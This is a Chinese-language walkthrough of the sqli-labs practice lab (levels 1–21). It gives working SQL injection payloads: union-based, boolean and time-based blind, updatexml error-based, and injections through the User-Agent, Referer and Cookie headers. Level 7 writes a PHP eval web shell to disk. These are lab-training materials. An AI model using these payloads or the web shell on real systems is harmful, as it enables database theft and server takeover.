打开小皮,并打开Apache2.4.39 和 MySQL5.7.26
打开网站创建网络 域名为sqli-labs 端口为8989 PHP版本5.3.29 根目录与WWW文件在同一路径,进行创建。
打开创建好的网站
打开网站就可以进行sqli-labs靶场通关啦
sql靶场通关秘籍
接下来让我们开始进行打靶吧!
Less-1
GET-Error based-Single quotes-String(基于错误的 GET 单引号字符型注入)
Less-1 **Error Based- String**
输入正常数据查看回显
通过判断是否存在注入点和注入类型来进行打靶
判断注入点 ?id=1查看是否存在注入点
确定存在注入点
将后面进行注释查看页面回显
页面回显正常判断注入方式为字符型注入
输入order by 来判断此列表有几列
当输入order by 3--+时显示正常
当输入order by 4--+时显示
表示4不在列数范围内,表明列表存在3列有效列
输入?id=-1'union select 1,2,3--+进行联合查询
输入?id=99' UNION SELECT 1,database(),3 --+进行爆表查询
接下来开始爆表名,在 information_schema.table 进行查询,使用 group_concat() 函数合并查询结果
?id=99' UNION SELECT 1,group_concat(table_name),3 FROM information_schema.tables WHERE table_schema='security'--+
接下来爆 users 表的字段,在 information_schema.columns 爆出来
?id=99' union select 1,group_concat(column_name),3 FROM information_schema.columns WHERE table_schema='security' and table_name='users'--+
爆出 users 表中的信息,这个表有用户名和密码这种敏感信息
?id=99' UNION SELECT 1,group_concat(concat_ws(':',username,password)),3 FROM security.users--+
PHP 文件 SQL 语句代码源码
$sql = "SELECT * FROM users WHERE id='$id' LIMIT 0,1"; $result = mysql_query($sql); $row = mysql_fetch_array($result); if($row) { echo "<font size='5' color= '#99FF00'>"; echo 'Your Login name:'. $row['username']; echo "<br>"; echo 'Your Password:' .$row['password']; echo "</font>"; } else { echo '<font color= "#FFFF00">'; print_r(mysql_error()); echo "</font>"; }
Less-2
GET-Error based-Intiger based (基于错误的 GET 整型注入)
Less-2 **Error Based- Intiger**
输入?id=1查看回显
输入id=1'判断注入类型
id=1'报错再尝试id=1"
依旧错误,将'和"去掉
回显正确,表明为数字型注入
输入?id=1 order by 4--+
显示4不在范围
输入?id=3 order by 3--+ 显示列表的列数为3
输入 ?id=99 UNION SELECT 1,2,3--+
数据库爆名 ?id=99 UNION SELECT 1,database(),3 --+
爆表名:?id=99 UNION SELECT 1,group_concat(table_name),3 FROM information_schema.tables WHERE table_schema='security'--+
爆user表:?id=99 union select 1,group_concat(column_name),3 FROM information_schema.columns WHERE table_schema='security' and table_name='users'--+
爆user表的信息:?id=99 UNION SELECT 1,group_concat(concat_ws(':',username,password)),3 FROM security.users--+
PHP 文件源码 SQL 语句
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1"; $result=mysql_query($sql); $row = mysql_fetch_array($result); if($row) { echo "<font size='5' color= '#99FF00'>"; echo 'Your Login name:'. $row['username']; echo "<br>"; echo 'Your Password:' .$row['password']; echo "</font>"; } else { echo '<font color= "#FFFF00">'; print_r(mysql_error()); echo "</font>"; }
Less-3
GET-Error based-Single quotes with twist string (基于错误的 GET 单引号变形字符型注入)
Less-3 Error Based- String (with Twist)
输入?id=1查看正常界面
输入?id=1'闭合查看回显判断是否有注入点
报错说明有注入点但是闭合方式不对,换成?id=1"
回显正常说明注入方式为字符型注入
使用以下命令去查询
?id=2')--+
?id=1') order by 3--+
?id=-1') union select 1,2,3--+
?id=-1') union select 1,database(),version()--+
?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+
?id=-1') union select 1,2,group_concat(username ,id , password) from users--+
PHP 源码文件 SQL 语句
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1"; $result=mysql_query($sql); $row = mysql_fetch_array($result); if($row) { echo "<font size='5' color= '#99FF00'>"; echo 'Your Login name:'. $row['username']; echo "<br>"; echo 'Your Password:' .$row['password']; echo "</font>"; } else { echo '<font color= "#FFFF00">'; print_r(mysql_error()); echo "</font>"; }
Less-4
输入?id=1判断注入点和注入方式
?id=1
?id=1' 网页也回显正常的信息
注入双引号闭合,MySQL 语句报错,说明存在注入漏洞,并且闭合符号是双引号+括号
将后面内容注释下,回显正确
数据信息获取方式可以参考第一关,除闭合方式外其余一致。
Fess-5
输入?id=1判断是否有注入点和注入类型
发现提示为You are in......
输入?id=1',提示错误
输入?id=1",提示You are in......
判断此为盲注类型
闭合方式:?id=1'
加上--+,注释掉后面的 SQL 语句
获取数据库信息
接下来判断表有几列,使用 ORDER BY 子句进行一个排序,看一下对几列有效。
?id=1' orderby 3--+ you are in ...
?id=1' order by 4--+ 报错信息即存在三列信息
使用 length() 函数结合回显信息判断数据库长度,多次尝试测试长度为8
?id=1' and length((select database()))=8 --+
获取数据库名,此处不适用 UNION 联合查询(因为当 id 为一个查不到的参数时,页面无显示。即因为是布尔注入)。我们使用 left() 函数,left(string, num) 函数返回字符串 string 最左边的 num 个字符串。
我们首先使用 left() 函数判断数据库名的第一位是否是字符 a。注入之后无回显,说明数据库名第一位不是 a
?id = 1' and left((select database()),1)='a' --+经过多次测试,第一位为s
?id = 1' and left((select database()),1)='a' --+
从a到z慢慢试最后得到
?id=1' AND LEFT((SELECT database()), 8)='security' --+
Less-6
判断是否存在注入点和注入类型
输入?id=1’
输入?id=1",出现报错
说明存在注入点闭合方式为",其余查询命令可以参考第五关命令。
Less-7
通过sql注入写一句话木马病毒。
通过修改 MySQL 下的 my.ini 配置文件就可以启用权限,需要把下面这个字符串写入文件中。
secure_file_priv="/"
判断闭合方式为?id=1'))
我们需要先知道网页所在的文件路径,从该题中的无法得到的,我们去 Less-1 题,在那获取文件路径。这种操作也可以应用在实践中,可以同时利用同一 Web 中的多个注入点。
使用 UNION 联合查询来注入参数,注意此处存在转义问题,所有的“\”都要双写
?id=1' UNION SELECT 1,2,'<?php @eval($_POST["123456"]);?>' into outfile "D:\\phpstudy_pro\\WWW\\sqli-labs\\Less-7\\text.php"--+
使用蚁剑连接,记得 url 要加上我们传入的 text.php。
Less-8
判断闭合方式
首先注入正确的参数,网页返回 “You are in...”,但是没有其他信息。
?id=1
然后注入一个查不到的参数,网页没有任何反应。说明向这个网页传入参数是用于判断 id 值是否存在,如果存在则返回信息
?id=9999
判断是否有 SQL 注入漏洞,注入个单引号进行闭合,网页无任何返回
?id=1'
此时还是注入单引号,但是后面注释掉,网页返回“You are in ...”。
这说明网页存在 SQL 注入漏洞,并且是用单引号字符型注入。同时因为 SQL 语句发生错误,因此此处是 bool 盲注漏洞
闭合方式:?id=1'--+
Less-9
首先注入正确的参数,网页返回 “You are in...”,但是没有其他信息。
首先注入正确的参数,网页返回“You are in ...”,但是没有其他信息
?id=1
接下来注入个查不到的参数,网页还是返回“You are in ...” ?id=9999
注入个单引号进行闭合,网页还是返回“You are in ...” ?id=1'
再尝试下面三种方式:网页仍然是“You are in ...”
?id=1' --+
?id=1"
?id=1" --+
我们转换思路,MySQL 的 sleep() 函数能够起到休眠的作用。为了方便调试,我们使用 Burp 拦截工具中的重放器
?id=1 and sleep(1) --+ 使用 Burp 工具开启拦截,并注入,发送都重放器,发送并观察时间
然后在网页中再次尝试
明显响应时间变长,这是明显的基于 时间盲注 的字符型 SQL 注入漏洞,我们需要使用 sleep() 函数制造时间差来进行注入。有时间延迟说明注入的
闭合方式:id = 1' and sleep(10) --+
获取数据库信息
注入流程与 Less-5 类似,不过这里的判断标准不是回显的信息,而是响应时间。MySQL 的 IF 语句允许根据表达式的某个条件或结果来执行一组 SQL 语句,语法如下,当表达式 expr 为真时返回 value1 的值,否则返回 value2
if(expr,value1,value2)
通过二分法测试,最终确定数据库长度为 8
?id=1' and if(length(database())=8,sleep(10),1) --+
使用穷举法进行测试,得到数据库名的第一个字符为 "s"
?id=1' and if(left((select database()),1)='s' ,sleep(10),1) --+
最终得到数据库名字为“security”
均通过响应时间来确定
接下来使用类似的方法,爆出表明、字段名和其他信息
Less-10
与第9关类似,属于通过时间盲注,只是闭合方式不同
获取数据库信息与第9关闭合方式不同,其余一样
Less-11
使用Username : admin Password : admin 进行正常登陆
接下来直接在 “Username” 中直接注入单引号,网页返回报错信息,说明存在 Sql 注入。
使用万能密码进行登陆查看闭合方式
闭合方式: ' or 1 = 1#
通过使用以下sql语句进行获取数据库信息
username: ' or 1=1 order by 3 #
username: ' or 1=1 order by 2 #
' UNION SELECT database(),1#
' union select 1,group_concat(table_name) from information_schema.tables where table_schema ='security' #
' union select 1,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' #
' union select 1,group_concat(concat_ws(';',username,password)) from security.users #
Less-12
查看注入方式和寻找注入点
a' or1 = 1#
注入以下的内容,统统都显示登录失败且无回显。
a') or 1 = 1#
a')) or 1 = 1#
使用双引号闭合,出现报错,
a " or 1=1
经过测试得知为a ") or 1=1
数据获取方式与11关类似,只是换成")即可。
Less-13
使用' or 1=1 #测试是否有注入点和注入类型
使用 ')or 1=1 进行测试
获取数据库信息
') or 1=1 or length((select database()))=8#
') or 1=1 or left((select database()),1)='s'#
使用类似的语句继续爆下面的信息。
Less-14
使用'or 1=1#查看什么闭合方式
发现使用" or 1=1 时回馈正确
Less-15
使用'or 1=1#查看什么闭合方式
以此使用双引号,加括号的方式,均没有回馈信息
当你注入完整的注入信息时,发现 ' or 1=1 # 是成功登陆界面,在此登陆界面只能通过成功与失败进行,可用使用 布尔 盲注或者时间盲注都行。
确认闭合方式为 ' or 1=1 #
获取信息可以使用布尔盲注,可以参考第九关除闭合方式不一样,语句类似
Less-16
使用15关的思路,与15关大同小异,只是闭合方式不同,通过测试发现
") or 1 = 1# 获取数据库信息和15关闭合方式不同,其余流程相同
Less-17
本关卡有两个 SQL 语句,其中一个进行了强效的过滤,我们需要发现第二个注入点。同时本关卡可以使用 报错注入 进行攻击
判断闭合方式
我们先按照网页的功能走一遍,目测是更改密码的页面,输入用户名之后用新密码覆盖旧密码
去第11关尝试,发现登陆成功,说明密码修改完成
使用单引号闭合构造恒真条件,网页回显密码修改失败。
a' OR 1 = 1#
测试一下所有的注入,发现这些注入网页都回显改密失败。
a') OR 1 = 1#
a')) OR 1 = 1#
a" OR 1 = 1# a") OR 1 = 1#
a")) OR 1 = 1#
我们切换下思路,之前我们的用户名字段都是空字符,现在我们写上一个已知的用户名 admin 再次注入。
uname=admin
passwd=' 出现报错信息
闭合方式:
uname=admin
passwd=' or 1=1 #
网页回显改密码成功,并且报了一个语法错误,说明 passwd 使用单引号进行闭合。同时我们可以推测这个关卡有 2 次查询,第一次是根据 uname 参数进行查询,判断要改密码的用户是否存在。第二次查询时根据要改密码的用户,把 passwd 参数覆盖原密码,这里在第二次查询有注入点。
updatexml() 报错注入
我们将使用 updatexml() 报错注入,该函数用于改变 XML 文档中符合条件的节点的值。函数原型为:
UPDATEXML (XML_document, XPath_string, new_value);
参数 说明
XML_document String,XML 文档对象的名称
XPath_string Xpath 格式的字符串
new_value String,用于替换查找到的符合条件的数据
其中参数 XPath_string 需要是“/xxx/xxx/...”的格式,进行查询时将会按照这个参数进行操作。注意:如果 XPath_string 是一个错误的路径,但是该路径符合参数规范,就不会报错。反之,参数不符合规范,则会触发报错,我们就是利用这个,通过 updatexml() 函数的报错回显我们需要的信息。
获取数据库信息
利用 updatexml() 函数获取下当前使用的 MySQL版本
' OR updatexml(1,concat("!",version()),2)#
获取数据库名:
uname=admin
password=' OR updatexml(1,concat("!",version()),2)#爆破表名:
uname=admin
passwd=' OR updatexml(1,concat("!",(SELECT group_concat(table_name) FROM information_schema.tables WHERE table_schema = 'security')),2)#爆破字段名:
uname=admin
password=' OR updatexml(1,concat("!",(SELECT group_concat(column_name) FROM information_schema.columns WHERE table_schema = 'security' AND table_name = 'users')),2) or'
爆破账号密码:
uname=admin
Less-18
判断闭合方式
注入正确的用户名和密码,观察到网页回显
注入个错误的用户名和密码,网页显示登录失败回显
Username:admin
Password:a
使用引号,双引号,括号的方式闭合,发现均为报错
登录成功时,User Agent 会回显, User Agent 头可能会存在注入
使用 brup 抓包
Ctrl +R 发送到 Repeater
修改 User-Agent 字段,添加一个引号,发现报错信息
闭合方式:User-Agent:' '
获取数据库信息
在注入的两个单引号之间可以插入其他 Sql 语句,我们在这里放置 updatexml() 报错注入语句。注意使用单引号闭合两侧的 Sql 语句时,相当于把它分割成了 2 部分,插入 updatexml() 报错时要用 or进行连接。
爆破数据库:' or updatexml(1,concat("!",database()),2)or '
爆破表名:' or updatexml(1,concat("!",(SELECT group_concat(table_name) FROM information_schema.tables WHERE table_schema = 'security')),2) or'
爆破字段名:' or updatexml(1,concat("!",(SELECT group_concat(column_name) FROM information_schema.columns WHERE table_schema = 'security' AND table_name = 'users')),2) or'
Less-19
第18关一样,只是闭合方式和注入点不同,在输入正确的账号和密码时,Referer显示回页面,所以我们判断它为注入点
获取数据库信息整体与第18关相同,注入点不用
Less-20
输入正确的用户名和密码进行登录,观察网页回显信息。刷新,Less 20 的页面没有变化,这应该是 cookie 起到作用。cookie 是网站为了辨别用户身份,进行 Session 跟踪而储存在用户本地终端上的数据。想要回到登录页面,需要先把 cookie 清除。
依次使用引号,双引号,括号的方式闭合,发现均为报错
为了发现注入点,首先抓登录网页发的包
发现有一个在网页所看到的
根据 Cookie 的作用和原理,网页在用户登录后,会利用浏览器记录用户的登录状态,在用户刷新、重新登录或进入其他相关页面时,不需要再次登录。
Cookie是一个注入点
我们在此次使用单引号闭合发现报错信息,说明处为注入点
根据报错信息我们确定闭合方式
Cookie:uname=' '
获取数据库信息整体与第18关相同,注入点不用
Less-21
闭合方式
首先随便输入正确的用户名和密码进行登录,观察到网页回显了大量信息,与第20关网页相同利用
相同的方法,我们发现此次还是Cookie作为注入点,但是闭合方式不同
闭合方式:Cookie:uname=') '
当我们想要获取数据库时发现,此次的注入点信息不是我们能够看懂的信息
通过转换我们发现此次使用的是base64编码,我们需要将我们所需要的命令优先转换为base64编码在进行发生,例如我们爆破数据库
' union select 1,database(),3#
我们需要将这个命令转换,在这个工具里面自动转换,也可以在网上转换后进行替换
转换完成后进行发送,得到所需
其余的爆破均使用该方法,其余命令与第18关相同,注入点不同